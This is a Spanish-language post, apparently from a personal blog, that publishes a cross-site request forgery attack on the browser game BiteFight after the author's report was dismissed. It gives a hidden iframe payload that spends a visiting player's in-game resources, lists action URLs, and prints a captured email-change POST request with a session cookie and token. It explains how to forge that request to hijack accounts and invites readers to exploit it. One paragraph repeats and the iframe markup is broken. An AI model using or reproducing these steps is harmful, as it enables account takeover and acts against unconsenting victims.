Bueno hace algun tiempo (poco en realidad xD ) jugaba bitefight jejejej y por cuestiones ajenas a mi xD me bannearon la cuenta, estuve viendo y bitefight es vulnerable a XSRF lo investigue con algo sencillo, al ver que no pedia confirmacion alguna al momento de hacer un cambio en la cuenta trate con comprar fuerza registrandome con otra cuenta, algo asi:
al poner "codigo malicioso" en alguna web es posible realizar acciones sin consentimiento del usuario, por ejemplo si queremos comprar alguna habilidad o que el usuario gaste dinero en una sola cosa e pondria algo como esto:
al poner "codigo malicioso" en alguna web es posible realizar acciones sin consentimiento del usuario, por ejemplo si queremos comprar alguna habilidad o que el usuario gaste dinero en una sola cosa e pondria algo como esto:
< width="0px" src="http://s7.bitefight.com.mx/bite/training.php?b=1" height="0px" align="center">< /iframe >
esa parte es para comprar fuerza, se agrega en una pagina y al momento que el usuario entra a la web maliciosa, automaticamente (si esta logueado en bitefight claro
defensa: http://s7.bitefight.com.mx/bite/training.php?b=2
destreza: http://s7.bitefight.com.mx/bite/training.php?b=3
resistencia: http://s7.bitefight.com.mx/bite/training.php?b=4
carisma: http://s7.bitefight.com.mx/bite/training.php?b=5
y asi hay varias acciones para hacer dentro del bf, tal vez diran que no es muy relevante, pero veamos y adentremos un poco mas en el tema, que tal si hacemos que el codigo malicioso sea un archivo php en el cual mande los headers correctos, podriamos incluso robar cuentas, borrarlas y todo lo que pueda hacer un usuario normal, este es el metodo post que se hace al cambiar un mail:
------------------
http://s7.bitefight.com.mx/bite/einstellungen.php
POST /bite/einstellungen.php HTTP/1.1
Host: s7.bitefight.com.mx
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://s7.bitefight.com.mx/bite/einstellungen.php
Cookie: BiteFight=59116%3B018580472e62cff0a377c14592cc2534
Content-Type: application/x-www-form-urlencoded
Content-Length: 139
w=y&vkey=f9e95b7f78e1c31713bb9d849b0b5f5b&email=komtec1%40gmail.com&rpg=&catch=&1=1&2=1&3=1&4=&5=&6=&7=&8=&passo=&passn1=&passn2=&delete0=0
HTTP/1.x 200 OK
Date: Sun, 19 Oct 2008 08:51:26 GMT
Server: Apache
Connection: close
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 3315
Content-Type: text/html; charset=utf-8
---------------------
si en esa parte cambiamos Cookie por un getcookie() en el servidor de bitefight y en la variable vkey validandola con la sesion, asi como email por el nuestro o el deseado a cambiar en la cuenta, se cambiara el correo, despues de que cargue toda esa parte del code se necesita agregar otro iframe con la direccion:
http://s7.bitefight.com.mx/bite/einstellungen.php?validate=1
para que mande el correo de validacion al mail puesto antes...
asi cualqueir accion que quieran realizar pueden programar el codigo y hacer que la victima entre a la apgina maliciosa :-D
siguiendo estos pasos se puede juankear bitefight jejeje lo unico que tienes que tener en cuenta es poner el servidor adecuado (s1,s2,s3,s4, etc etc) y si es .com.mx o .es o .com.pe etc :-D
PD. les avise y pensaron que no era relevante por lo tanto me tiraron de a loco
por eso libero esto :-D
si quieren ver un video de demostracion de este "bug" aqui tienen la direccion:
http://elbebedero.net/sipsicambia.rar
es el que les enseñe para que vieran que si era vulnerable
Saludos y espero le sepan sacar provecho :-D
Komtec1
Comentarios